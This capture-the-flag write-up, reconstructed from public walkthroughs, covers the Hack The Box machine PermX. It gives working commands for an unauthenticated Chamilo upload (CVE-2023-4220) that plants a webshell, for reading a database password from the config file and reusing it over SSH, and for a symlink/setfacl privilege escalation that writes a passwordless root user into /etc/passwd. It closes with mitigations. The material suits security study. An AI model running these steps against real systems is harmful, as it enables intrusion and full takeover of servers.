Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

PermX is an Easy Linux box: Chamilo LMS 1.11.24 unauth file upload (CVE-2023-4220 / CVE-2023-31803) → PHP webshell as www-data. DB pw 03F6lY3uXAP2bkW8 reused for mtz SSH. Privesc: sudo /opt/acl.sh runs setfacl against a path that’s checked with [ -f ] (which follows symlinks). Symlink /etc/passwd into ~mtz/, then run the script to grant yourself write — append a UID-0 user → su to root.

The chain:

1. CVE-2023-4220: POST to /main/inc/lib/javascript/bigupload/inc/bigUpload.php uploads any file to bigupload/files/ → webshell as www-data.
2. app/config/configuration.php → chamilo : 03F6lY3uXAP2bkW8 reused for mtz SSH.
3. sudo /opt/acl.sh mtz rwx /home/mtz/<file> → setfacl on <file>. The script’s path check uses [ -f ] which resolves symlinks. Symlink /etc/passwd → grant write → append r00t::0:0::/root:/bin/bash → su r00t → root.

Recon

22/tcp     OpenSSH
80/tcp     Apache → permx.htb (default)
+ vhosts: www.permx.htb, lms.permx.htb (Chamilo 1.11.24)

Foothold — CVE-2023-4220

curl -F "[email protected]" \
   "http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
# upload completes; reach at:
curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/shell.php?c=id'
# www-data

$ cat /var/www/chamilo/app/config/configuration.php | grep db_password
... 'db_password' => '03F6lY3uXAP2bkW8',
$ ssh mtz@<TARGET>
Password: 03F6lY3uXAP2bkW8

Privesc — sudo acl.sh + symlink

$ cat /opt/acl.sh
#!/bin/bash
user="$1"; perm="$2"; target="$3"
if [[ "$target" != /home/mtz/* ]]; then echo bad; exit 1; fi
if [ ! -f "$target" ]; then echo bad; exit 1; fi
/usr/bin/setfacl -m u:"$user":"$perm" "$target"

# Path check passes for /home/mtz/passwd (symlink)
# [-f $target] follows the symlink; setfacl operates on the LINK TARGET
$ ln -sf /etc/passwd /home/mtz/passwd
$ sudo /opt/acl.sh mtz rwx /home/mtz/passwd
$ echo 'r00t::0:0::/root:/bin/bash' >> /etc/passwd
$ su r00t
# root

Why each step worked

• CVE-2023-4220: Chamilo’s bigUpload module checks nothing about uploaded file extensions; classic.
• DB pw reuse: standard.
• setfacl follows symlinks: documented; the script validates the symlink path but setfacl modifies the resolved target’s ACL.

Counterfactuals

• Patch Chamilo ≥ 1.11.26.
• Don’t reuse DB credentials as Linux passwords.
• For path-restricted sudo scripts, use realpath -e --canonicalize-existing and re-check.
• setfacl should be invoked with --no-dereference (or similar option) if available.

Source attribution

Reconstruction is grounded in:

• 0xdf, “HTB: PermX” — https://0xdf.gitlab.io/2024/11/02/htb-permx.html
• IppSec, “PermX” video walkthrough — https://ippsec.rocks/?#PermX
• Chamilo CVE-2023-4220 advisory.

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.